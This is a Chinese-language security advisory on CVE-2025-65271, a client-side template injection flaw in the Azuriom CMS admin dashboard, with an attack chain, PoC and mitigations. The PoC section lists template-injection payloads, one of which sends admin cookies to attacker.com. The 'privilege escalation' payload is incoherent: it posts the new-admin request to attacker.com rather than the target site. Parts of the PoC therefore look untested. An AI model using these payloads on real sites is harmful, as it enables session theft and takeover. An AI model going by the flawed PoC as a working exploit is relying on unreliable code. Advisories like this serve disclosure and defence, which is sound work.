CVE-2025-65271 Azuriom CMS 客户端模板注入漏洞导致权限提升

漏洞信息

漏洞编号

CVE-2025-65271

漏洞类型

客户端模板注入 (CSTI)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Azuriom CMS

漏洞概述

CVE-2025-65271是Azuriom CMS中发现的一个高危客户端模板注入（CSTI）漏洞。该漏洞存在于Azuriom CMS的管理员仪表板中，允许低权限用户在被管理员会话的上下文中执行任意模板代码。攻击者可以通过插件或仪表板组件渲染不可信的用户输入来触发此漏洞，从而可能实现权限提升至管理员账户。Azuriom是一个流行的开源CMS平台，常用于游戏服务器网站和其他在线社区。该漏洞的CVSS评分为8.8，属于高危级别，对系统的机密性、完整性和可用性都造成严重影响。漏洞已在Azuriom 1.2.7版本中修复。

技术细节

Azuriom CMS的客户端模板注入漏洞源于其模板引擎对用户输入的不当处理。在管理员仪表板中，某些组件（如插件或仪表板小部件）会直接将用户可控的数据渲染到模板中，而没有进行充分的输入验证和输出编码。攻击者（即使是低权限用户）可以通过在这些可控输入点注入恶意模板代码，当管理员访问相关页面时，恶意代码会在管理员的浏览器会话中执行。由于代码在管理员上下文中执行，攻击者可以借此窃取管理员会话cookie、修改管理员账户设置、创建新的管理员账户，甚至完全接管网站。攻击者常利用{{ }}或{{{ }}}等模板语法注入JavaScript代码，配合社会工程学手段诱导管理员访问恶意页面，即可实现无声的权限提升。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者注册Azuriom CMS低权限账户，并识别存在模板注入风险的插件或仪表板组件

STEP 2

步骤2

注入阶段：攻击者在插件设置、仪表板小部件或其他用户可控的输入点注入恶意模板代码（如{{constructor.constructor('...')()}}）

STEP 3

步骤3

触发阶段：等待管理员访问包含恶意代码的页面，触发客户端模板注入

STEP 4

步骤4

执行阶段：恶意JavaScript代码在管理员浏览器会话中以管理员权限执行

STEP 5

步骤5

利用阶段：攻击者通过JavaScript窃取管理员会话cookie、创建新管理员账户或修改现有账户权限，实现持久化权限提升

STEP 6

步骤6

持久化控制：利用获取的管理员权限完全接管Azuriom CMS系统，执行任意管理操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-65271 PoC - Azuriom CMS Client-Side Template Injection -->
<!-- Low-privilege user injects malicious template code via plugin/dashboard component -->
<!-- When admin views the page, arbitrary JavaScript executes in admin context -->

<!-- Example 1: Basic XSS via template injection -->
{{constructor.constructor('alert(document.cookie)')()}}

<!-- Example 2: Session hijacking payload -->
{{{constructor.constructor('fetch("https://attacker.com/steal?c="+document.cookie)')()}}}

<!-- Example 3: Privilege escalation to admin -->
{{constructor.constructor('fetch("https://attacker.com/api/admin/create",{method:"POST",body:JSON.stringify({username:"hacker",password:"P@ssw0rd",role:"admin"})})')()}}

<!-- Example 4: Using AngularJS template injection (if applicable) -->
{{$on.constructor('alert("CSTI")')()}}

<!-- Attack scenario: -->
<!-- 1. Attacker (low-privilege) injects payload into plugin setting or dashboard widget -->
<!-- 2. Payload is stored and rendered when admin visits the affected page -->
<!-- 3. Malicious JS executes in admin browser with admin privileges -->
<!-- 4. Attacker exfiltrates admin session or performs admin actions -->

影响范围

Azuriom CMS < 1.2.7

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）禁用不受信任的第三方插件；2）限制低权限用户创建自定义仪表板组件的权限；3）实施严格的CSP策略防止恶意脚本执行；4）监控管理员会话异常活动；5）考虑临时关闭公开注册功能以减少攻击面。